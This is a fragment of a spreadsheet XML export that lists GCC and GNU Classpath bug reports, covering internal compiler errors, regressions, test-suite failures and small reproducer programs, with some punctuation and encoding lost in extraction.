        compiled by GNU C version 4.7.2 GMP version 5.0.2 MPFR version 3.1.1 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (Gentoo 4.7.2-r1 p1.4 pie-0.5.5) version 4.7.2 (x86_64-pc-linux-gnu)
        compiled by GNU C version 4.7.2 GMP version 5.0.2 MPFR version 3.1.1 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: b73b2677ca23c504b32a2ee915f40344
GCC4.7-bug.c: In function â€˜mainâ€™:
GCC4.7-bug.c:12303:1: internal compiler error: in account_size_time at ipa-inline-analysis.c:601
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-83654</t>
  </si>
  <si>
    <t>-fstack-clash-protection probes below the stack pointer for VLA with constant size</t>
  </si>
  <si>
    <t>Created attachment 43010
const-vla.c
On i386 the reproducer compiles to:
f2:
.LFB0:
        .cfi_startproc
        pushl   %ebp
        .cfi_def_cfa_offset 8
        .cfi_offset 5 -8
        movl    %esp %ebp
        .cfi_def_cfa_register 5
        subl    $8 %esp
        leal    -4096(%esp) %eax
        cmpl    %eax %esp
        je      .L5
.L7:
        subl    $4096 %esp
        orl     $0 4092(%esp)
        cmpl    %eax %esp
        jne     .L7
.L5:
        orl     $0 -4(%esp)
The final probe accesses memory below the stack pointer.  i386 does not have a red zone so this results in a valgrind warning:
==375071== Invalid read of size 4
==375071==    at 0x80482EE: main (in /root/build-32/a.out)
==375071==  Address 0xfeb83d0c is on thread 1's stack
==375071==  4 bytes below stack pointer
I don't think this issue is observable without valgrind so the severity is low.  However it affects glibc's getaddrinfo implementation so it seems worthwhile addressing this.
The issue might not be target-specific.  x86-64 results in similar code but valgrind won't warn because of the red zone.</t>
  </si>
  <si>
    <t>GCC-37812</t>
  </si>
  <si>
    <t>[4.4 Regression] Invalid mnemonic 'lvlx'</t>
  </si>
  <si>
    <t>Since revision 140892 (r140513 works) the following tests fail in both 32 and 64 bit modes:
FAIL: gcc.target/powerpc/altivec-1.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-1.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-12.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-12.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-24.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-24.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-3.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-3.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-cell-2.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-cell-2.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-cell-3.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-cell-3.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-cell-4.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-cell-4.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-cell-8.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-cell-8.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-consts.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-consts.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-varargs-1.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-varargs-1.c compilation failed to produce executable
FAIL: gcc.target/powerpc/altivec-vec-merge.c (test for excess errors)
WARNING: gcc.target/powerpc/altivec-vec-merge.c compilation failed to produce executable
For all of them the error is Invalid mnemonic 'lvlx'.</t>
  </si>
  <si>
    <t>GCC-8413</t>
  </si>
  <si>
    <t>internal compiler error</t>
  </si>
  <si>
    <t>got this error message when kompiling kismet with gcc-3.2 (included in suse 8.1)
tragx:~/airsnort/kismet-2.6.2 # make
g++ -Ilibpcap-2002.07.02 -O2 -Wall -DVERSION_MAJOR=2 -DVERSION_MINOR=6 -DVERSION_TINY=2 -g -O2 -g -O2 -c configfile.cc -o configfile.o
g++ -Ilibpcap-2002.07.02 -O2 -Wall -DVERSION_MAJOR=2 -DVERSION_MINOR=6 -DVERSION_TINY=2 -g -O2 -g -O2 -c speech.cc -o speech.o
/usr/include/g++/bits/basic_string.h: In function `std::string
   ExpandSpeechString(std::basic_string
   std::allocator &gt; const packet_info* int)':
/usr/include/g++/bits/basic_string.h:338: Internal compiler error in
   expand_call at calls.c:3049
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [speech.o] Error 1
Release:
gcc-3.2
Environment:
nothing special
How-To-Repeat:
configure and compile http://freshmeat.net/redir/kismet/20911/url_tgz/kismet-2.6.2.tar.gz
with gcc-3.2 on suse 8.1</t>
  </si>
  <si>
    <t>GCC-48887</t>
  </si>
  <si>
    <t>[4.7 Regression][OOP] SELECT TYPE:  Associate name shall not be a pointer/allocatable</t>
  </si>
  <si>
    <t>From F2008 16.5.1.6 Construct association:
If the selector is allocatable it shall be allocated the associate name is associated with the data object and does not have the ALLOCATABLE attribute.
If the selector has the POINTER attribute it shall be associated the associate name is associated with the target of the pointer and does not have the POINTER attribute.
However gfortran accepts the following ifort and NAG don't.
It works if the associate name is explicitly given using associate-name =&gt; selector however it does not change the POINTER/ALLOCATABLE issue as: The associate name of a SELECT TYPE construct is the associate-name if specified otherwise it is the name that constitutes the selector.
type t
end type t
class(t) allocatable :: alloc
class(t) pointer     :: ptr
select type(alloc)
type is (t)
  allocate(alloc) ! INVALID: alloc is not allocatable
end select
select type(ptr)
type is (t)
  nullify(ptr) ! INVALID: ptr is not a pointer
end select
end
For an longer example see 
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/88b65a2c9024e95f</t>
  </si>
  <si>
    <t>GCC-2737</t>
  </si>
  <si>
    <t>User-defined thrown exception is not found</t>
  </si>
  <si>
    <t>ERROR:
/u/jddahl/java/sources/test/core/LotNumber.java:28: Class `InitializationException' not found in `throws'.
       public LotNumber( String lot ) throws InitializationException
MAKEFILE:
 # macro definitions
MAKE = /usr/ucb/gmake
GCJ = /usr/jddahl/jcc/bin/gcj
OBJECTS = /u/jddahl/java/objects_linux
SOURCES = /u/jddahl/java/sources
OPATH = $(OBJECTS)/test/core
SPATH = $(SOURCES)/test/core
CLASSPATH = -classpath .:$(OBJECTS):$(SOURCES)
# program file
$(OPATH)/LotNumber.o:	$(OPATH)/InitializationException.o $(SPATH)/LotNumber.java
	$(GCJ) -c -o $(OPATH)/LotNumber.o $(SPATH)/LotNumber.java
$(OPATH)/InitializationException.o:	$(SPATH)/InitializationException.java
	$(GCJ) -c -o $(OPATH)/InitializationException.o $(SPATH)/InitializationException.java
#	$(MAKE) -f $(SPATH)/InitializationException.mak
JAVA FILE:
public class LotNumber
{
    public LotNumber( String lot ) throws InitializationException
    {
...
The InitializationException class is in the same package and directory 
as the LotNumber class.
How do I include the InitializationException.o in the new LotNumber.o other than as a prerequisite.
Release:
unknown
Environment:
Redhat 6.2
How-To-Repeat:
Seems any user=defined exception that is thrown may not be
included.</t>
  </si>
  <si>
    <t>jddahl</t>
  </si>
  <si>
    <t>GCC-48245</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/lto/pr46940 c_lto_pr46940_0.o assemble on *-apple-darwin*</t>
  </si>
  <si>
    <t>Following revision 171039 the test with gcc.dg/lto/pr46940* fails on *-apple-darwin* with both -m32 and -m64:
FAIL: gcc.dg/lto/pr46940 c_lto_pr46940_0.o assemble -O0 -flto -flto-partition=none 
FAIL: gcc.dg/lto/pr46940 c_lto_pr46940_0.o assemble -O2 -flto -flto-partition=none 
FAIL: gcc.dg/lto/pr46940 c_lto_pr46940_0.o assemble -O0 -flto -flto-partition=1to1 
FAIL: gcc.dg/lto/pr46940 c_lto_pr46940_0.o assemble -O2 -flto -flto-partition=1to1 
FAIL: gcc.dg/lto/pr46940 c_lto_pr46940_0.o assemble -O0 -flto
FAIL: gcc.dg/lto/pr46940 c_lto_pr46940_0.o assemble -O2 -flto
The errors are 
/opt/gcc/p_work/gcc/testsuite/gcc.dg/lto/pr46940_0.c:11:28: error: only weak aliases are supported in this configuration
compiler exited with status 1
Before revision 171039 the test was unsupported:
UNSUPPORTED: /opt/gcc/p_work/gcc/testsuite/gcc.dg/lto/pr46940_0.c
because the test for 'check_linker_plugin_available' in /opt/gcc/p_work/gcc/testsuite/lib/target-supports.exp returned
gcc: fatal error: -fuse-linker-plugin but liblto_plugin.so not found
while following revision 171039 the same test compiles and executes without error.
Note that among the tests using 'dg-require-linker-plugin':
/opt/gcc/p_work/gcc/testsuite/gcc.dg/lto/20100722-1_0.c
/opt/gcc/p_work/gcc/testsuite/gcc.dg/lto/20110201-1_0.c
/opt/gcc/p_work/gcc/testsuite/gcc.dg/lto/pr46940_0.c
/opt/gcc/p_work/gcc/testsuite/gcc.dg/lto/pr47188_0.c
/opt/gcc/p_work/gcc/testsuite/gcc.dg/pr43157.c
pr46940_0.c is the only one failing.</t>
  </si>
  <si>
    <t>GCC-821</t>
  </si>
  <si>
    <t>erreur of compilater</t>
  </si>
  <si>
    <t>Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ cetproc.cpp cetproc.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus cetproc.ii -quiet -dumpbase cetproc.cpp -version -o cetproc.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
stan.h:166: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
make: *** [cetproc.o] Error 1
Release:
unknown</t>
  </si>
  <si>
    <t>baczje</t>
  </si>
  <si>
    <t>GCC-10563</t>
  </si>
  <si>
    <t>istream and locale: make check failures (regression from 3.2)</t>
  </si>
  <si>
    <t>I get unexpected failures in make check in libstdc++ with gcc-3.2.1 through gcc-3.2.3 (gcc-3.2.0 had no problems). The problem seems
to  appear in tests related to ctype. My locale setting is C.  
                === libstdc++-v3 tests ===
Running target unix
FAIL: 21_strings/inserters_extractors.cc execution test
FAIL: 22_locale/ctor_copy_dtor.cc execution test
XPASS: 22_locale/ctype_is_wchar_t.cc execution test
FAIL: 22_locale/ctype_scan_char.cc execution test
FAIL: 22_locale/ctype_to_char.cc execution test
FAIL: 22_locale/facet.cc execution test
XPASS: 22_locale/members.cc execution test
XPASS: 22_locale/messages_byname.cc execution test
XPASS: 22_locale/messages_members_char.cc execution test
XPASS: 22_locale/moneypunct_byname.cc execution test
XPASS: 22_locale/moneypunct_members_char.cc execution test
XPASS: 22_locale/moneypunct_members_wchar_t.cc execution test
XPASS: 22_locale/numpunct_byname.cc execution test
XPASS: 22_locale/numpunct_members_char.cc execution test
XPASS: 22_locale/numpunct_members_wchar_t.cc execution test
FAIL: 22_locale/operators.cc execution test
FAIL: 26_numerics/c99_classification_macros_c.cc (test for excess errors)
FAIL: 26_numerics/complex_inserters_extractors.cc execution test
FAIL: 27_io/istream_extractor_arith/01.cc execution test
FAIL: 27_io/istream_extractor_arith/07.cc execution test
FAIL: 27_io/istream_extractor_arith/08.cc execution test
FAIL: 27_io/istream_extractor_arith/09.cc execution test
FAIL: 27_io/istream_extractor_arith/10.cc execution test
FAIL: 27_io/istream_extractor_arith/11.cc execution test
FAIL: 27_io/istream_extractor_arith/12.cc execution test
FAIL: 27_io/istream_extractor_arith/13.cc execution test
FAIL: 27_io/istream_extractor_char.cc execution test
FAIL: 27_io/istream_manip.cc execution test
FAIL: 27_io/istream_sentry.cc execution test
FAIL: 27_io/ostream_inserter_arith.cc execution test
WARNING: program timed out.
FAIL: thread/pthread4.cc execution test
                === libstdc++-v3 Summary ===
# of expected passes            412
# of unexpected failures        21
# of unexpected successes       10
# of expected failures          16
Compiler version: 3.2.3
Release:
gcc-3.2.3
Environment:
&gt; gcc -v
Reading specs from /usr/linux-local/gcc-3.2.3/lib/gcc-lib/i686-pc-linux-gnu/3.2.3/specs
Configured with: ../configure --prefix=/usr/linux-local/gcc-3.2.3 --with-local-prefix=/usr/linux-local
Thread model: posix
gcc version 3.2.3
&gt; 
System type: i686-pc-linux-gnu
glibc: 2.2.2
How-To-Repeat:
../configure
make bootstrap &amp;&amp; make -k check</t>
  </si>
  <si>
    <t>andreas.amann</t>
  </si>
  <si>
    <t>GCC-62071</t>
  </si>
  <si>
    <t>[4.10 Regression] ICE: in before_dom_children at tree-ssa-pre.c:4411</t>
  </si>
  <si>
    <t>During Firefox -flto libxul link I get:
/var/tmp/mozilla-central/dom/events/TextComposition.cpp: In member function â€˜_ZN7mozilla15TextComposition26CompositionEventDispatcher3RunEv.part.96â€™:
/var/tmp/mozilla-central/dom/events/TextComposition.cpp:217:0: internal compiler error: in before_dom_children at tree-ssa-pre.c:4411
 TextComposition::CompositionEventDispatcher::Run()
 ^
0xa7760b eliminate_dom_walker::before_dom_children(basic_block_def*)
        ../../gcc/gcc/tree-ssa-pre.c:4411
0xdfd667 dom_walker::walk(basic_block_def*)
        ../../gcc/gcc/domwalk.c:177
0xa74402 eliminate
        ../../gcc/gcc/tree-ssa-pre.c:4526
0xa74645 execute
        ../../gcc/gcc/tree-ssa-pre.c:4941
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[6]: *** [/tmp/cceU40zS.ltrans9.ltrans.o] Error 1
make[6]: *** Waiting for unfinished jobs....
lto-wrapper: fatal error: make returned 2 exit status
compilation terminated.
/usr/bin/ld: fatal error
Started with r213739.
I will try to reduce this next week.</t>
  </si>
  <si>
    <t>GCC-69588</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: tree check: expected ssa_name have var_decl in unlink_stmt_vdef at tree-ssa-operands.c:1314</t>
  </si>
  <si>
    <t>Originally filed downstream at https://bugs.gentoo.org/show_bug.cgi?id=568260
I did my best to check for duplicates but this is my first foray into the gcc bugzilla and I'm a bit overwhelmed.
template  class error_info {
public:
  typedef T value_type
  error_info(value_type const 
  ~error_info() throw()
}
template  void operator)
int a
void vfork()
template 
error_info::error_info(value_type const &amp;) {}
template  error_info::~error_info() throw() {}
void Run() {
  error_info() (a)
  vfork()
}
$ /usr/bin/x86_64-pc-linux-gnu-g++ -O2 -fPIC -c reduced.cpp -o reduced.o
reduced.cpp: In function â€˜void Run()â€™:
reduced.cpp:17:29: warning: deprecated conversion from string constant to â€˜error_info::value_type {aka char*}â€™ [-Wwrite-strings]
   error_info() (a)
                             ^
reduced.cpp:19:1: internal compiler error: tree check: expected ssa_name have var_decl in unlink_stmt_vdef at tree-ssa-operands.c:1314
 }
 ^</t>
  </si>
  <si>
    <t>moltonel</t>
  </si>
  <si>
    <t>GCC-40435</t>
  </si>
  <si>
    <t>[4.5 regression] Revision 148442 caused many regressions on trunk</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 148455 gave
FAIL: gcc.dg/Wshadow-3.c  (test for warnings line 47)
FAIL: gcc.dg/Wshadow-3.c (test for excess errors)
FAIL: gcc.dg/func-ptr-conv-1.c (test for excess errors)
FAIL: gcc.dg/func-ptr-conv-1.c bad conversion (test for warnings line 40)
FAIL: gcc.dg/func-ptr-conv-1.c bad conversion (test for warnings line 41)
FAIL: gcc.dg/pr36902.c  (test for warnings line 47)
FAIL: gcc.dg/pr36902.c (test for excess errors)
Revision 148431 is OK.</t>
  </si>
  <si>
    <t>GCC-66999</t>
  </si>
  <si>
    <t>Missing comma in lambda capture causes internal compiler error</t>
  </si>
  <si>
    <t>I found a spot in some code where I was missing a comma between two values in the lambda capture so instead of [i &amp;d] I had [i &amp;d]. In older versions of GCC (4.8.1 and 4.9 tested) it actually compiled this without complaining and appears to capture both i and d. In GCC 5.1.0 and 5.2.0 it fails to compile with an internal compiler error:
13 : internal compiler error: in ~saved_token_sentinel at cp/parser.c:1199
--------------------------------------------------------------------------
#include 
#include 
using namespace std
int main(int argc char* argv[]) {
  int i = 1
  int d = 2
  auto f = thread([
       i &amp;d] () {
     // If you comment out the next two lines this doesn't compile
     auto p = d
     //std::cout &lt;&lt; p &lt;&lt; std::endl
     std::cout &lt;&lt; i &lt;&lt; std::endl
     std::cout &lt;&lt; d &lt;&lt; std::endl
     return 0
  })
  return 0
}
--------------------------------------------------------------------------
Compiler options: -std=c++11 -O2 -Wall -Wextra
gcc.godbolt.org explorer for this: http://goo.gl/CCVpRP</t>
  </si>
  <si>
    <t>paradise</t>
  </si>
  <si>
    <t>GCC-24917</t>
  </si>
  <si>
    <t>Handling of hexadecimal constants in gfortran</t>
  </si>
  <si>
    <t>Compilation of the following program TEST.f fails:
PROGRAM HEX_TEST
INTEGER(4) MASK
MASK = 'c0'X
END
~ $ gfortran -c TEST.f
 In file TEST.f:5
      MASK = 'c0'X
     1
Error: Unclassifiable statement at (1)
whereas the following code compiles correctly:
PROGRAM HEX_TEST
INTEGER(4) MASK
MASK = X'c0'
END
As stated in http://gcc.gnu.org/ml/fortran/2005-11/msg00382.html the first version of the code is an extension which was supported in g77 therefore it should also be supported in gfortran.
The compiler I used to test this is:
~ $ gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.0.2/configure
--prefix=/home/iev/apps/gcc-4.0.2 --enable-languages=cc++f95
--enable-shared --enable-threads=posix --disable-checking
--with-system-zlib --enable-__cxa_atexit --disable-libgcj --disable-nls
Thread model: posix
gcc version 4.0.2</t>
  </si>
  <si>
    <t>iev</t>
  </si>
  <si>
    <t>GCC-59005</t>
  </si>
  <si>
    <t>Having designated inits in C++ with -std=c++11 does not cause any errors</t>
  </si>
  <si>
    <t>This piece of code:
#include 
using namespace std
int main(int argc char** argv)
{
    int test[2][2] ={
        [0]={12}
        [1]={34}
    }
    for (int x = 0 x&lt;2x++)
    {
        for (int y = 0 y&lt;2 y++)
        {
            cout &lt;&lt; test[x][y] &lt;&lt; endl
        }
    }
    return 0
}
will compile and execute fine when running:
g++ -Wall -std=c++11 -pedantic test.cpp
No errors or warnings are shown even if designated initializers are not supported in the C++11 standard. 
Using: GCC 4.8.1
Target: x86_64-suse-linux
Flags: -Wall -std=c++11 -pedantic</t>
  </si>
  <si>
    <t>p.micolet</t>
  </si>
  <si>
    <t>GCC-15649</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with __builtin_isgreater and -ffast-math</t>
  </si>
  <si>
    <t>Compiling the following testcase (which is from PR4765) with
gcc -ffast-math causes an ICE on mainline (i686-pc-linux-gnu):
=======================================================
double foo (double x)
{
    return __builtin_isgreater(x0.0) ? 0.0 : x
}
=======================================================
The error message reads:
PR4765.c: In function `foo':
PR4765.c:3: internal compiler error: in fold at fold-const.c:8156
Please submit a full bug report [etc.]
Roger your patch
http://gcc.gnu.org/ml/gcc-cvs/2004-05/msg00694.html
seems to be responsible for the regression. Could you please have a look?</t>
  </si>
  <si>
    <t>CLASSPATH-22942</t>
  </si>
  <si>
    <t>java.text.SimpleDateFormat parse(String) fails when String is including GMT</t>
  </si>
  <si>
    <t>'public Date parse (String dateStr ParsePosition pos)' calls 
computeOffset' method at line 1002 to check GMT timezone style. When the result isn't null 'pos' aren't changed in GNU Classpath 0.15. 'computeOffset' method have to return the length of matched string.</t>
  </si>
  <si>
    <t>GCC-14310</t>
  </si>
  <si>
    <t>[tree-ssa] nonlocal goto savearea mode != STACK_SAVEAREA_MODE</t>
  </si>
  <si>
    <t>explow.c:update_nonlocal_goto_save_area does not construct an object with the
mode specified by STACK_SAVEAREA_MODE macro.  This causes
explow.c:emit_stack_save() to ICE when the modes do not match.
Testsuite failures:
gcc.c-torture/execute/920428-2.c
gcc.c-torture/execute/920501-7.c
gcc.c-torture/execute/comp-goto-2.c
gcc.c-torture/execute/nestfunc-5.c
gcc.c-torture/execute/nestfunc-6.c</t>
  </si>
  <si>
    <t>GCC-42714</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in create_tmp_var at gimplify.c:504</t>
  </si>
  <si>
    <t>early IPA SRA runs into
&gt; ./cc1plus -quiet x_20.ii -O2
/usr/src/packages/BUILD/kdebindings-4.3.90/build/smoke/qt/x_20.cpp: In function '__smokeqt::x_QXmlStreamAttributes::x_QXmlStreamAttributes(QVectorData**)':
/usr/src/packages/BUILD/kdebindings-4.3.90/build/smoke/qt/x_20.cpp:2974:62: internal compiler error: in create_tmp_var at gimplify.c:504
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-67893</t>
  </si>
  <si>
    <t>[5 Regression] memory hog building a C++ file (on x86_64-linux-gnu)</t>
  </si>
  <si>
    <t>Created attachment 36462
preprocessed source
this is one file from the insighttoolkit software a swig generated source file.
built with -g -O2 -fstack-protector-strong -fPIC -fno-strict-aliasing
trunk needs -fpermissive in addition.
memory usage with the 4.9 branch peaks at 2.5G with the 5 branch at 3.3G with trunk at 2.3G.</t>
  </si>
  <si>
    <t>GCC-46292</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/vector-shift2.c compilation  -O3 -g</t>
  </si>
  <si>
    <t>spawn /home2/dave/gcc-4.6/objdir/gcc/xgcc -B/home2/dave/gcc-4.6/objdir/gcc/ /hom
e2/dave/gcc-4.6/gcc/gcc/testsuite/gcc.c-torture/execute/vector-shift2.c -w -O3 -
g -lm -o /home2/dave/gcc-4.6/objdir/gcc/testsuite/gcc/vector-shift2.x4
/home2/dave/gcc-4.6/gcc/gcc/testsuite/gcc.c-torture/execute/vector-shift2.c: In 
function 'main':
/home2/dave/gcc-4.6/gcc/gcc/testsuite/gcc.c-torture/execute/vector-shift2.c:57:1
: internal compiler error: in simplify_subreg_concatn at lower-subreg.c:416
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/home2/dave/gcc-4.6/gcc/gcc/testsuite/gcc.c-torture/execute/vector-shift2.c: In 
function 'main':
/home2/dave/gcc-4.6/gcc/gcc/testsuite/gcc.c-torture/execute/vector-shift2.c:57:1
: internal compiler error: in simplify_subreg_concatn at lower-subreg.c:416
Breakpoint 1 simplify_subreg_concatn (outermode=SImode op=0x400bf220 byte=0)
    at ../../gcc/gcc/lower-subreg.c:416
416	      gcc_assert (VECTOR_MODE_P (innermode))
(gdb) p innermode
$1 = TImode
This is on hppa-unknown-linux-gnu (32-bit target).</t>
  </si>
  <si>
    <t>GCC-46978</t>
  </si>
  <si>
    <t>[4.6 Regression] TRANSPOSE with RESHAPE and ALLOCATE: Segfault</t>
  </si>
  <si>
    <t>Created attachment 22783
the source files and Makefile
I found a serious issue with the TRANSPOSE intrinsic function possibly when
combined with the reshape intrinsic.
I tried to create a small sample program but I was unsuccessful.
Therefore I decided to start from the failing big program and made it as small
as possible but still showing the issue. It turned out to be very tricky and
there are still 4275 lines of code left.
However all of the code in mods.f90 is necessary to build the structure mesh
and is fine. The problem appears at a single line in the small main program
after building the mesh structure.
The corruption is related to the statement:
   mesh%objects(1)%coor = transpose ( reshape ( a (/2nno/) ) )
at line 113 in the file mainprog.f90 which corrupt other parts of the
structure mesh. In particular the parts mesh%blocks(2)%elements and
mesh$blocks(3)%elements are overwritten. For example:
mesh%blocks(3)%elements before:
          1           1           1           1           1          21
22          23          24          25
mesh%blocks(3)%elements after:
          1           1           1           1           1          21
22          23           0  1072693248
If I remove the stop statement at line 124 I also get a message:
*** glibc detected *** mainprog: double free or corruption (!prev): 0x00000000008fe440 ***
with a corresponding backtrace.
If I uncomment lines 5 6 and 7 in mainprog.f90 and basically
replacing the intrinsic transpose with my own version the problem is gone.
Note that it runs fine with gfortran from 6th June 2010 (from Tobias Burnusâ€™
homepage) g95 ifort Lahey/Fujitsu and nagfor.</t>
  </si>
  <si>
    <t>GCC-3709</t>
  </si>
  <si>
    <t>GCC 3.0 segmentation fault</t>
  </si>
  <si>
    <t>/usr/bin/../lib/gcc-lib/i586-pc-linux-gnu/3.0/cc1 -fpreprocessed evcompile.i -quiet -dumpbase evcompile.c -O3 -Wall -version -o evcompile.s
GNU CPP version 3.0 (cpplib) (i386 Linux/ELF)
GNU C version 3.0 (i586-pc-linux-gnu)
        compiled by GNU C version 3.0.
objs/obj_u/Eval/evcompile.c: In function `BGl_EVCOMPILEz00zz__EVCOMPILEz00':
objs/obj_u/Eval/evcompile.c:3492: warning: control reaches end of non-void function
objs/obj_u/Eval/evcompile.c: In function `BGl_EVCOMPILEzd2LAMBDAzd2zz__EVCOMPILEz00':
objs/obj_u/Eval/evcompile.c:5200: Internal error: Segmentation fault
Release:
gcc-3.0
Environment:
i386
tune=i586 march=pentium
GNU/Linux Mandrake 7.2
kernel 2.4.3
glibc 2.1.3
Taken from gcc -v:
#include ... search starts here:
#include  search starts here:
 /sw/bigloo2.3a/lib/2.3a
 /sw/bigloo2.3a/gc-boehm
 /usr/lib/gcc-lib/i586-pc-linux-gnu/3.0/include
 /usr/local/include
 /usr/include
End of search list.
 /usr/bin/../lib/gcc-lib/i586-pc-linux-gnu/3.0/cc1 -fpreprocessed evcompile.i -quiet -dumpbase evcompile.c -O3 -Wall -version -o evcompile.s
GNU CPP version 3.0 (cpplib) (i386 Linux/ELF)
GNU C version 3.0 (i586-pc-linux-gnu)
        compiled by GNU C version 3.0.
How-To-Repeat:
Simply compile using the flags described above. Should hopefully work</t>
  </si>
  <si>
    <t>olale</t>
  </si>
  <si>
    <t>GCC-50070</t>
  </si>
  <si>
    <t>Segmentation fault at size_binop_loc in fold-const.c</t>
  </si>
  <si>
    <t>Created attachment 24998
just compile it
gfortran compiler Segmentation fault at size_binop_loc in fold-const.c</t>
  </si>
  <si>
    <t>GCC-78779</t>
  </si>
  <si>
    <t>libgcc/soft-fp/op-common.h:900: possible missing break ?</t>
  </si>
  <si>
    <t>../../../trunk/libgcc/soft-fp/op-common.h:900:10: warning: this statement may fall through [-Wimplicit-fallthrough=]
Source code is
    case _FP_CLS_COMBINE (FP_CLS_NAN FP_CLS_NORMAL):   \
    case _FP_CLS_COMBINE (FP_CLS_NAN FP_CLS_INF):      \
    case _FP_CLS_COMBINE (FP_CLS_NAN FP_CLS_ZERO):     \
      R##_s = X##_s                    \
                                \
    case _FP_CLS_COMBINE (FP_CLS_INF FP_CLS_INF):      \
    case _FP_CLS_COMBINE (FP_CLS_INF FP_CLS_NORMAL):   \
Suggest either add the missing break or document the fallthrough.</t>
  </si>
  <si>
    <t>GCC-67167</t>
  </si>
  <si>
    <t>cilkplus vectorization problems</t>
  </si>
  <si>
    <t>I think there is a problem with vectorization of arithmetic operations in the cilkplus implementation in gcc. I have inspected generated asm of the following two implementations of vector addition (a = a + b). The code is compiled with 'gcc -O3 -mavx -ftree-vectorize -fopt-info-vec -fcilkplus test.c'.
// ICC compatibility - alignment hint
#ifdef __GNUC__
#define __assume_aligned(lvalueptr align) lvalueptr = __builtin_assume_aligned (lvalueptr align)
#endif
#define RESTRICT __restrict__
typedef double Double
void test(Double * RESTRICT a Double * RESTRICT b int size)
{
  int i
  __assume_aligned(a 64)
  __assume_aligned(b 64)
  for(i=0 i&lt;size i++)
    a[i] = a[i] + b[i]
}
void test_cilkplus1(Double * RESTRICT a Double * RESTRICT b int size)
{
  __assume_aligned(a 64)
  __assume_aligned(b 64)
  a[0:size] = a[0:size] + b[0:size]
}
The first code (test) is vectorized as expected - here comes the ASM:
.L4:
        vmovapd (%rdi%r8) %ymm0
        addl    $1 %r9d
        vaddpd  (%rsi%r8) %ymm0 %ymm0
        vmovapd %ymm0 (%rdi%r8)
        addq    $32 %r8
        cmpl    %r9d %ecx
        ja      .L4
On the contrary the second function (test_cilkplus1) is not vectorized:
.L21:
        vmovsd  (%rdi%rax) %xmm0
        movl    %ecx %r8d
        addl    $1 %ecx
        vaddsd  (%rsi%rax) %xmm0 %xmm0
        vmovsd  %xmm0 (%rdi%rax)
        addq    $8 %rax
        cmpl    %r8d %edx
        jg      .L21
Now I have made sure that the compiler understands that there is no aliasing (restrict) and that the vectors are aligned in memory. Clearly this is enough for the standard implementation to produce a vectorized code but not for the CilkPlus array notation.</t>
  </si>
  <si>
    <t>marcin.krotkiewski</t>
  </si>
  <si>
    <t>GCC-43804</t>
  </si>
  <si>
    <t>[4.6 regression] ICE in reload_cse_simplify_operands</t>
  </si>
  <si>
    <t>$ gcc/xgcc -Bgcc/ -O2 -fpic -S memusage.i 
memusage.c: In function â€˜meâ€™:
memusage.c:311:1: error: insn does not satisfy its constraints:
(insn 342 136 137 10 memusage.c:253 (set (reg/f:SI 2 %d2 [137])
        (const:SI (unspec:SI [
                    (symbol_ref:SI (start_sp) [flags 0x1a] )
                    (const_int 2 [0x2])
                ] 6))) 36 {*movsi_m68k} (nil))
memusage.c:311:1: internal compiler error: in reload_cse_simplify_operands at postreload.c:396
Caused by:
commit e38def9ca7953bb5611d08ce8617249516ba5a99
Author: rth 
Date:   Mon Sep 14 19:18:58 2009 +0000
    Squash commit of EH in gimple
